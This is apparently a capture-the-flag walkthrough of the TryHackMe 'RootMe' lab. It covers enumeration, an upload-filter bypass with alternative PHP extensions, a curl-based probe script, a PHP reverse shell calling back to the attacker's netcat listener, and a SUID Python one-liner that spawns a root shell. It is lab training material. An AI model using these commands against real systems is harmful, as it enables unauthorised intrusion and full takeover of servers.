
RootMe - TryHackMe Walkthrough

A beginner-friendly boot2root machine covering web enumeration, file upload bypass, reverse shell exploitation, and privilege escalation via a SUID Python binary.

Room URL: https://tryhackme.com/room/rootme

Difficulty: Easy


Tools & Techniques Used

  • Nmap
  • Gobuster
  • PHP reverse shell
  • File upload filter bypass
  • Netcat (reverse shell listener)
  • SUID exploitation (Python)
  • GTFOBins

Step-by-Step Walkthrough

1. Enumeration

Run an initial scan to identify open services:

nmap -sC -sV -oN nmap.txt <TARGET_IP>

Typical findings:

Port  Service  Notes
22    SSH      OpenSSH 7.6p1
80    HTTP     Apache 2.4.29 (Ubuntu)

2. Web Directory Enumeration

Use Gobuster to discover hidden directories:

gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirb/common.txt

Key findings:

  • /panel — File upload page
  • /uploads — Directory where uploaded files are stored

3. File Upload Exploitation

Navigate to http://<TARGET_IP>/panel/ — you'll find a file upload form.

Prepare a PHP Reverse Shell

Use the pentestmonkey PHP reverse shell or create your own. Update the IP and port:

$ip = '<YOUR_IP>';
$port = 4444;

Bypass the Filter

The upload form rejects files whose name ends in .php, but the check is an extension blocklist only, and Apache's PHP handler is commonly configured to execute several other extensions as PHP. Bypass it with one of those:

  • Rename your shell to shell.php5 (if that one is served as plain text instead of executed, try .phtml, .php4 or .phar); which extensions actually run depends on the server's handler configuration, so confirm by browsing to the uploaded file in /uploads

Start a Listener

On your machine:

nc -lvnp 4444

Upload and Trigger

  1. Upload the renamed shell via /panel
  2. Navigate to http://<TARGET_IP>/uploads/shell.php5
  3. You should receive a reverse shell as www-data
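Rather than uploading the full reverse shell under each extension blindly, a quicker way to find out which extension the server both accepts and executes is to upload a harmless PHP marker under each candidate name and fetch it back. The script below is an added example, not part of the original walkthrough; it assumes the upload form posts a multipart field named "file" to /panel/ and that uploaded files keep their name under /uploads (neither is stated on the page, so check the form's HTML first and adjust FIELD and the URLs).

```shell
#!/bin/sh
# Added example: probe which alternative PHP extensions the /panel upload form
# accepts AND the web server actually executes. Not from the original page.
# Assumptions (not stated in the walkthrough): the form field is named "file"
# and the upload is POSTed to /panel/. Set TARGET to run it:
#   TARGET=10.10.10.10 sh upload_probe.sh
set -e

TARGET="${TARGET:-}"
FIELD="${FIELD:-file}"                       # assumed form field name
UPLOAD_URL="http://$TARGET/panel/"
UPLOADS_URL="http://$TARGET/uploads"
EXTS="php phtml php3 php4 php5 phar"

# Harmless marker: if the server executes it, the body is just "PHPOK";
# if it is only served as a static file, the <?php tag comes back verbatim.
MARKER='<?php echo "PHPOK"; ?>'

write_probe() {                              # write_probe <path>
  printf '%s\n' "$MARKER" > "$1"
}

# Classify the body returned when fetching an uploaded probe. The <?php check
# comes first because a file served as text contains both strings.
classify_response() {                        # classify_response <body>
  case "$1" in
    *'<?php'*) echo served-as-text ;;
    *PHPOK*)   echo executed ;;
    *)         echo not-found-or-blocked ;;
  esac
}

probe_ext() {                                # probe_ext <ext> -> "<ext> <result>"
  ext="$1"
  tmp="$(mktemp -d)"
  write_probe "$tmp/probe.$ext"
  # -F sends multipart/form-data, the same encoding an HTML file input uses.
  curl -s -o /dev/null -F "$FIELD=@$tmp/probe.$ext" "$UPLOAD_URL"
  body="$(curl -s "$UPLOADS_URL/probe.$ext")"
  echo "$ext $(classify_response "$body")"
  rm -rf "$tmp"
}

if [ -n "$TARGET" ]; then
  for e in $EXTS; do probe_ext "$e"; done
fi
```

Any extension reported as "executed" is the one to give the real reverse shell; "served-as-text" means the upload got past the filter but the handler will not run it, and "not-found-or-blocked" means the filter rejected it or the file was stored elsewhere.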

4. User Flag

Locate the user flag, then read it (on this box it sits under the web root):

find / -name "user.txt" 2>/dev/null
cat /var/www/user.txt

5. Privilege Escalation

Find SUID Binaries

Search for root-owned files with the SUID bit set (these execute with the owner's privileges no matter who runs them):

find / -type f -user root -perm /4000 2>/dev/null

Key finding: /usr/bin/python has the SUID bit set.

Exploit SUID Python

Use the GTFOBins SUID technique for python: exec a shell with -p so it keeps the elevated effective UID instead of dropping back to www-data:

/usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

Verify (whoami reports the effective user, which is now root; the real UID is still www-data, so without -p the shell would have dropped privileges):

whoami
# root

6. Root Flag

Collect the root flag:

cat /root/root.txt

Notes

  • Redact any real passwords/flags if publishing publicly.
  • Key takeaways:
    • Extension-blocklist upload filters can often be bypassed with an alternative extension the server still executes as PHP
    • Root-owned SUID binaries are a common privilege escalation vector
    • Always check GTFOBins for known escapes before trying anything custom on a SUID binary